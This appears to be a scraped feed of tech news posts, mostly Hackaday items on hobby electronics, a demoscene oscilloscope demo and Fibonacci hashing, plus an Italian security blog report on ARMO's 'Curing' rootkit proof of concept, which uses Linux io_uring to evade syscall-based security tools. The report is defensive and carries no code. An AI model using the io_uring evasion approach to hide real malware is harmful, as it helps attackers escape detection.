
[ViciousSquid] is still working on this project, and hopes to eventually implement a management system in the future, allowing the various behavior variables to be tracked over time and overall allow it to act in a way more familiar to the 90s digital pets it’s modeled after. It’s an interesting and fun take on those games, though, and much of the code is available on GitHub for others to experiment with as well. For those looking for the original 90s games, head over to this project where an emulator for Tamagotchis was created using modern microcontroller platforms.

hackaday.com/2025/04/26/digita…

Classic demos from the demoscene are all about showing off one’s technical prowess, with a common side order of a slick banging soundtrack. That’s precisely what [BUS ERROR Collective] members [DJ_Level_3] and [Marv1994] delivered with their prize-winning Primer demo this week.

This demo is a grand example of so-called “oscilloscope music”—where two channels of audio are used to control an oscilloscope in X-Y mode. The sounds played determine the graphics on the screen, as we’ve explored previously.

The real magic is when you create very cool sounds that also draw very cool graphics on the oscilloscope. The Primer demo achieves this goal perfectly. Indeed, it’s intended as a “primer” on the very artform itself, starting out with some simple waveforms and quickly spiraling into a graphical wonderland of spinning shapes and morphing patterns, all to a sweet electronic soundtrack. It was created with a range of tools, including Osci-Render and apparently Ableton 11, and the recording performed on a gorgeous BK Precision Model 2120 oscilloscope in a nice shade of green.

If you think this demo is fully sick, you’re not alone. It took out first place in the Wild category at the Revision 2025 demo party, as well as the Crowd Favorite award. High praise indeed.

We love a good bit of demoscene magic around these parts.

youtube.com/embed/6DifrkaALOg?…

Thanks to [STrRedWolf] for the tip!

hackaday.com/2025/04/26/amazin…

Il problema nel runtime Linux è correlato all’interfaccia io_uring e consente ai rootkit di passare inosservati, aggirando i moderni strumenti di sicurezza aziendale. Questa caratteristica è stata scoperta dai ricercatori di ARMO, che hanno creato unrootkit proof-of-concept chiamato Curing, che dimostra gli attacchi utilizzando io_uring.

io_uring è un’interfaccia del kernel Linux per operazioni di I/O asincrone. È stato introdotto nel 2019 in Linux 5.1 per risolvere i problemi di prestazioni e scalabilità nel sistema I/O tradizionale.

Invece di affidarsi a chiamate di sistema che causano carichi pesanti e portano al blocco dei processi, io_uring utilizza buffer ad anello condivisi tra i programmi e il kernel di sistema e mette in coda le richieste di I/O in modo che possano essere elaborate in modo asincrono.

Secondo i ricercatori, il problema si verifica perché la maggior parte degli strumenti di sicurezza monitora le chiamate di sistema e gli hook sospetti (come ptrace o seccomp), ma ignora completamente tutto ciò che riguarda io_uring, creando un pericoloso “punto cieco” nel sistema.

Gli esperti spiegano che io_uring supporta un’ampia gamma di operazioni, tra cui la lettura e la scrittura di file, la creazione e l’accettazione di connessioni di rete, l’avvio di processi, la modifica dei permessi dei file e la lettura del contenuto delle directory, il che lo rende uno strumento potente, soprattutto quando si tratta di rootkit. I rischi erano così grandi che gli sviluppatori di Google decisero di disabilitare io_uring di default su Android e ChromeOS.

Per mettere alla prova la loro teoria, ARMO ha sviluppato Curing, un rootkit che utilizza io_uring per ricevere comandi da un server remoto ed eseguire operazioni arbitrarie senza richiamare chiamate di sistema. I test di Curing con diverse soluzioni di sicurezza note hanno dimostrato che la maggior parte di esse non era in grado di rilevarne l’attività.

Inoltre, ARMO riferisce di aver testato strumenti commerciali e di aver confermato la loro incapacità di rilevare malware tramite io_uring. Tuttavia, i ricercatori non hanno rivelato quali soluzioni commerciali sono state testate. Per coloro che desiderano testare la resilienza dei propri ambienti contro tali minacce, ARMO ha già ospitato Curing su GitHub .

I ricercatori ritengono che il problema possa essere risolto utilizzando Kernel Runtime Security Instrumentation (KRSI), che consentirà di collegare i programmi eBPF agli eventi del kernel correlati alla sicurezza.

L'articolo Scoperto un nuovo rootkit per Linux invisibile agli antivirus: la minaccia si chiama Curing proviene da il blog della sicurezza informatica.

Sometimes, a flat display just won’t cut it. If you’re looking for something a little rounder, perhaps your vision could persist in in looking at [lhm0]’s rotating LED sphere RP2040 POV display.

As you might have guessed from that title, this persistence-of-vision display uses an RP2040 microcontroller as its beating (or spinning, rather) heart. An optional ESP01 provides a web interface for control. Since the whole assembly is rotating at high RPM, rather than slot in dev boards (like Pi Pico) as is often seen, [lhm0] has made custom PCBs to hold the actual SMD chips. Power is wireless, because who wants to deal with slip rings when they do not have to?
The LED-bending jig is a neat hack-within-a-hack.
[lhm0] has also bucked the current trend for individually-addressable LEDs, opting instead to address individual through-hole RGB LEDs via a 24-bit shift-register. Through the clever use of interlacing, those 64 LEDs produce a 128 line display. [lhm0] designed and printed an LED-bending jig to aid mounting the through-hole LEDs to the board at a perfect 90 degree angle.

What really takes this project the extra mile is that [lhm0] has also produced a custom binary video/image format for his display, .rs64, to encode images and video at the 128×256 format his sphere displays. That’s on github,while a seperate library hosts the firmware and KiCad files for the display itself.

This is hardly the first POV display we’ve highlighted, though admittedly it isn’t the cheapest one. There are even other spherical displays, but none of them seem to have gone to the trouble of creating a file format.

If you want to see it in action and watch construction, the video is embedded below.

youtube.com/embed/TCV0LSV6ubA?…

hackaday.com/2025/04/25/rp2040…

In the realm of computer science, it’s hard to go too far without encountering hashing or hash functions. The concept appears throughout security, from encryption to password storage to crypto, and more generally whenever large or complex data must be efficiently mapped to a smaller, fixed-size set. Hashing makes the process of looking for data much faster for a computer than performing a search and can be incredibly powerful when mastered. [Malte] did some investigation into hash functions and seems to have found a method called Fibonacci hashing that not only seems to have been largely forgotten but which speeds up this lookup process even further.

In a typical hashing operation, the data is transformed in some way, with part of this new value used to store it in a specific location. That second step is often done with an integer modulo function. But the problem with any hashing operation is that two different pieces of data end up with the same value after the modulo operation is performed, resulting in these two different pieces of data being placed at the same point. The Fibonacci hash, on the other hand, uses the golden ratio rather than the modulo function to map the final location of the data, resulting in many fewer instances of collisions like these while also being much faster. It also appears to do a better job of using the smaller fixed-size set more evenly as a consequence of being based around Fibonacci numbers, just as long as the input data doesn’t have a large number of Fibonacci numbers themselves.

Going through the math that [Malte] goes over in his paper shows that, at least as far as performing the mapping part of a hash function, the Fibonacci hash performs much better than integer modulo. Some of the comments mention that it’s a specific type of a more general method called multiplicative hashing. For those using hash functions in their code it might be worth taking a look at either way, and [Malte] admits to not knowing everything about this branch of computer science as well but still goes into an incredible amount of depth about this specific method. If you’re more of a newcomer to this topic, take a look at this person who put an enormous bounty on a bitcoin wallet which shows why reverse-hashing is so hard.

hackaday.com/2025/04/25/hash-f…

[IMSAI Guy] grabbed an obsolete XOR gate and tried a classic circuit to turn it into a frequency doubler. Of course, being an old part, it won’t work at very high frequencies, but the circuit is super simple, just using the gate and an RC network. You can see a video of his exploration below.

The simple circuit seems like it should work, but in practice, it needed an extra component. In theory, the RC circuit acts as an edge detector. So, each edge of the input signal causes a pulse on the output as the second input lags the first.

That sounds good, but it looked terrible on the scope until a 1K resistor tied to the capacitor shifted the bias point of the gate. In all fairness, the original schematic used a Schmitt trigger gate, which may have made a difference had one been available. There were slight differences, though, depending on the type of device. An LS part, for example, didn’t need the extra resistor.

Of course, an RC network is just one way to delay the input, and the delay determines the width of the output pulse and constrains the input frequency and duty cycle. However, you could use other gates, including the other XOR gates in the package to realize a fast delay.

Frequency doublers are very common at microwave frequencies, but they don’t work in the same way. There are several ways to do it, but a common method is to use a nonlinear element to generate plenty of harmonics and then filter off everything but the second one. Or the third one, if you wanted a tripler instead.

youtube.com/embed/oaiqkirNTsM?…

hackaday.com/2025/04/25/xor-ga…